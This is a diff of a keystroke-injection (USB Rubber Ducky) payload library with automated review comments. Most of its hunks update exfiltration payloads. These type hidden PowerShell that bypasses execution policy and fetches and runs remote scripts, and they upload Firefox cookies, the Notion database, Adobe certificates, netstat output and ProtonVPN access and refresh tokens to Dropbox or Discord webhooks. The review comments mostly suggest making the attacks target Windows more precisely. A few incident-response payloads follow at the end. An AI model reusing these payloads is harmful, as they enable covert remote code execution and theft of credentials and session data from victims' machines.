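Review bot: The Requirements comment at the top of this file says `REM - Discord Webhook`, but every constant the hunk adds is for Dropbox (`#DROPBOX_FOLDER_NAME`, `#DROPBOX_API_CONST`) and the upload goes to the Dropbox API. The requirement should read `REM - Dropbox access token`, so a reader knows which credential the payload carries and which outbound host (`content.dropboxapi.com`) to expect. The added `REM Set yout Dropbox folder name` also has a typo (`your`).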
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
index 1b02c917b..771665820 100644
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
@@ -1,26 +1,66 @@
-REM ##########################################
-REM # |
-REM # Title : Exfiltrate Process Info |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ##########################################
+REM_BLOCK
+##########################################
+# #
+# Title : Exfiltrate Process Info #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+##########################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Webhook
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
-DEFINE PAYLOAD example.com
+DEFINE #PAYLOAD example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass irm
-STRING PAYLOAD
-STRING | iex
-ENTER
+STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex
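Review bot: The added PASSIVE_WINDOWS_DETECT extension sets `$_OS`, but the keystrokes after `END_EXTENSION` are not conditioned on it. On a host detected as NOT_WINDOWS, `GUI r` and the PowerShell line are still typed into whatever has focus. The extension's own documentation block shows the intended guard: wrapping the injection in `IF ($_OS == WINDOWS) THEN` … `END_IF` keeps the payload from acting on systems outside its stated target. As far as their hunks show, the Notion, Export_Cookies_From_Firefox, Adobe Reader, download-links and ProtonVPN-config payloads add the same extension without the guard.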
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
index faf0d9fbb..432a66ac0 100644
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
@@ -33,18 +33,12 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
Github
-
-
-
-
- Instagram
- |
- Discord
+ Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
index 86103688a..bc463548b 100644
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
@@ -1,26 +1,68 @@
-REM #########################################################################
-REM # |
-REM # Title : Exfiltrates the entire database of the Notion client |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM #########################################################################
-
+REM_BLOCK
+#########################################################################
+# #
+# Title : Exfiltrates the entire database of the Notion client #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+#########################################################################
+END_REM
REM Requirements:
REM - Notion must be installed
REM - Internet Connection
-
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
-STRING PowerShell
-ENTER
+STRINGLN PowerShell
DELAY 2000
REM Settings about Notion DB
diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
index 3ef6e5c85..88aa91e1b 100644
--- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
@@ -1,31 +1,69 @@
-REM ####################################################
-REM # |
-REM # Title : Export Firefox Cookies Database |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################
-
+REM_BLOCK
+####################################################
+# #
+# Title : Export Firefox Cookies Database #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+####################################################
+END_REM
REM Requirements:
REM - Firefox must be installed
-
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
-DEFINE DROPBOX_ACCESS_TOKEN "example"
+DEFINE #DROPBOX_ACCESS_TOKEN "example"
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-DELAY 500
-ENTER
+STRINGLN powershell
DELAY 2000
-
REM Get cookies DB path
STRINGLN
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
@@ -33,14 +71,8 @@ STRINGLN
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
-END_STRINGLN
-
-REM Setting about exfiltration
-STRING $accessToken =
-STRING DROPBOX_ACCESS_TOKEN
-ENTER
+ $accessToken = #DROPBOX_ACCESS_TOKEN
-STRINGLN
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite"
diff --git a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
index 0f88392a6..62b6d05a9 100644
--- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
+++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
@@ -1,26 +1,68 @@
-REM ####################################################################
-REM # |
-REM # Title : Export all saved certificates with Adobe Reader |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################################
-
+REM_BLOCK
+####################################################################
+# #
+# Title : Export all saved certificates with Adobe Reader #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+####################################################################
+END_REM
REM Requirements:
REM - Adobe Reader must be installed
REM - Internet Connection
-
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 1000
-STRING PowerShell
+STRINGLN PowerShell
DELAY 2000
REM Settings about Adobe Reader
diff --git a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
index c8a8bcd39..517cd702b 100644
--- a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
+++ b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
@@ -1,20 +1,63 @@
-REM ###########################################################
-REM # |
-REM # Title : Exports all the links of the downloads |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###########################################################
-
+REM_BLOCK
+###########################################################
+# #
+# Title : Exports all the links of the downloads #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10/11 #
+# #
+###########################################################
+END_REM
REM Requirements:
REM - Firefox installed
-
REM You must define your Discord webhook if you want to use this method for the exfiltration
-DEFINE DISCORD_WEBHOOK example
+DEFINE #DISCORD_WEBHOOK example
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Firefox
GUI
@@ -49,9 +92,7 @@ DELAY 10000
STRINGLN "
REM Exfiltration using Discord Webhook
-STRING $WebhookUrl = "
-STRING DISCORD_WEBHOOK
-STRINGLN "
+STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json
diff --git a/payloads/library/exfiltration/ProtonVPN-config/payload.txt b/payloads/library/exfiltration/ProtonVPN-config/payload.txt
index 796d694f4..aa1f6d959 100644
--- a/payloads/library/exfiltration/ProtonVPN-config/payload.txt
+++ b/payloads/library/exfiltration/ProtonVPN-config/payload.txt
@@ -1,43 +1,83 @@
-REM ###################################################################
-REM # |
-REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Credentials, Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################################
-
-REM Title: ProtonVPN-config-to-Discord-Exfiltration
-REM Author: Aleff
-REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
-REM In the config file you can find a lot information about the user like:
-REM - UserUid
-REM - UserAccessToken
-REM - UserRefreshToken
-REM - UserAuthenticationPublicKey
-REM - UserAuthenticationSecretKey
-REM - UserAuthenticationCertificatePem
-REM - UserCertificationServerPublicKey
-REM - and so on...
-REM Then it cleans up traces of what you have done after.
-REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
-REM Version: 1.0
-REM Category: Credentials, Exfiltration
-REM Requirements: ProtonVPN user logged at least one time and internet connection
-REM
+REM_BLOCK
+###################################################################
+# #
+# Title : ProtonVPN-config-to-Discord-Exfiltration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Credentials, Exfiltration #
+# Target : Windows 10-11 #
+# #
+###################################################################
+
+Title: ProtonVPN-config-to-Discord-Exfiltration
+Author: Aleff
+Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+ In the config file you can find a lot information about the user like:
+ - UserUid
+ - UserAccessToken
+ - UserRefreshToken
+ - UserAuthenticationPublicKey
+ - UserAuthenticationSecretKey
+ - UserAuthenticationCertificatePem
+ - UserCertificationServerPublicKey
+ - and so on...
+ Then it cleans up traces of what you have done after.
+Target: Windows 10-11 (PowerShell + ProtonVPN software)
+Version: 1.0
+Category: Credentials, Exfiltration
+Requirements: ProtonVPN user logged at least one time and internet connection
+END_REM
+
+REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
+DEFINE #PAYLOAD example.com
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks//
-DEFINE WEBHOOK example.com
+DEFINE #WEBHOOK example.com
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass $discord='
-STRING WEBHOOK
-
-REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
-DEFINE PAYLOAD example.com
-STRING ';irm PAYLOAD | iex
-ENTER
+STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
index 955e368a4..5a813a2f8 100644
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
@@ -41,18 +41,12 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
Github
-
-
-
-
- Instagram
- |
- Discord
+ Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
index 452d12031..0f6747468 100644
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
@@ -1,12 +1,14 @@
-REM ###########################################################
-REM # |
-REM # Title : Tree Structure Of The Operating System |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###########################################################
+REM_BLOCK
+###########################################################
+# #
+# Title : Tree Structure Of The Operating System #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+###########################################################
+END_REM
REM Requirements:
REM - Internet connection
diff --git a/payloads/library/exfiltration/Windows-netstat/payload.txt b/payloads/library/exfiltration/Windows-netstat/payload.txt
index 8728395ae..c2133e392 100644
--- a/payloads/library/exfiltration/Windows-netstat/payload.txt
+++ b/payloads/library/exfiltration/Windows-netstat/payload.txt
@@ -1,45 +1,84 @@
-REM ###################################################################
-REM # |
-REM # Title : Windows-netstat-to-Discord-Exfiltration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Net, Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################################
-
-REM Title: Windows-netstat-to-Discord-Exfiltration
-REM Author: Aleff
-REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
-REM Put 1 on the function that you want to active, else 0. Functions available:
-REM - default (simple 'netstat' command)
-REM - routing_table $r
-REM - listening_canonical $lc
-REM - listening_numerical $ln
-REM - all_canonical $ac
-REM - all_numerical $an
-REM - offload ot
-REM - proto $p ""
-REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
-
-REM Target: Windows 10-11 (PowerShell)
-REM Version: 1.0
-REM Category: Net, Exfiltration
-REM Requirements: Internet connection
-REM
+REM_BLOCK
+###################################################################
+# #
+# Title : Windows-netstat-to-Discord-Exfiltration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Net, Exfiltration #
+# Target : Windows 10-11 #
+# #
+###################################################################
+
+Title: Windows-netstat-to-Discord-Exfiltration
+Author: Aleff
+Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+Put 1 on the function that you want to active, else 0. Functions available:
+- default (simple 'netstat' command)
+- routing_table $r
+- listening_canonical $lc
+- listening_numerical $ln
+- all_canonical $ac
+- all_numerical $an
+- offload ot
+- proto $p ""
+- - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
+
+Target: Windows 10-11 (PowerShell)
+Version: 1.0
+Category: Net, Exfiltration
+Requirements: Internet connection
+END_REM
REM REQUIRED - Provide your Discord WEBHOOK
-DEFINE WEBHOOK https://discordapp.com/api/webhooks//
+DEFINE #WEBHOOK https://discordapp.com/api/webhooks//
+
+REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
+DEFINE #PAYLOAD example.com
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass $discord='
-
-STRING WEBHOOK
-
-REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
-DEFINE PAYLOAD example.com
-STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
-ENTER
+STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex
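Review bot: `$_OS` is set by the added PASSIVE_WINDOWS_DETECT extension but never read. `GUI r` and the `STRINGLN powershell …` line follow `END_EXTENSION` unconditionally, so the keystrokes are typed on any host, including a non-Windows one where they land in whatever has focus. Wrapping the injection in `IF ($_OS == WINDOWS) THEN` … `END_IF`, as the extension's own EXAMPLE USAGE block shows, keeps the payload to its declared target (Windows 10-11). As far as their hunks show, the same applies to the other payloads on this page that add this extension without branching on `$_OS`: Defend_yourself_against_CVE-2023-36884, Alien Message From Computer, Change Wallpaper With Screenshot, Full-ScreenBannerJoke and PlayASongThroughSpotify_Windows.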
diff --git a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
index 2f387638d..e86dc0120 100644
--- a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
+++ b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
@@ -1,13 +1,14 @@
-REM #############################################################################################
-REM # #
-REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : incident-response #
-REM # Target : Cisco IOS XE #
-REM # #
-REM #############################################################################################
-
+REM_BLOCK
+#############################################################################################
+# #
+# Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : incident-response #
+# Target : Cisco IOS XE #
+# #
+#############################################################################################
+END_REM
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
DEFINE #SCRIPT-NAME auto-check.sh
@@ -75,17 +76,17 @@ STRINGLN
done' > #PATH-TO-SCRIPT#SCRIPT-NAME
END_STRINGLN
-
-
REM To avoid some bad DELAY I decided to use only one command row
-REM Old script
-REM STRINGLN sudo chmod +x #SCRIPT-NAME
-REM DELAY 500
-REM STRINGLN #SUDO-PSWD
-REM DELAY 3000
-REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
-REM STRINGLN exit
+REM_BLOCK
+Old script:
+ STRINGLN sudo chmod +x #SCRIPT-NAME
+ DELAY 500
+ STRINGLN #SUDO-PSWD
+ DELAY 3000
+ STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
+ STRINGLN exit
+END_REM
REM Optimized script
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
diff --git a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
index 9bb09a834..0cb57d158 100644
--- a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
+++ b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
@@ -1,34 +1,79 @@
-REM #######################################################################################################################
-REM # |
-REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Incident Response |
-REM # Target : Windows 10/11 |
-REM # |
-REM #######################################################################################################################
+REM_BLOCK
+#######################################################################################################################
+# #
+# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Incident Response #
+# Target : Windows 10/11 #
+# #
+#######################################################################################################################
-REM PlugAndPlay <3
+PlugAndPlay <3
-REM Requirements:
-REM - ExecutionPolicy Bypass
+Requirements:
+ - ExecutionPolicy Bypass
-REM Impact: Remote Code Execution
-REM Max Severity: Important
+Impact: Remote Code Execution
+Max Severity: Important
-REM Mitigation:
+Mitigation:
-REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
+ - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
-REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
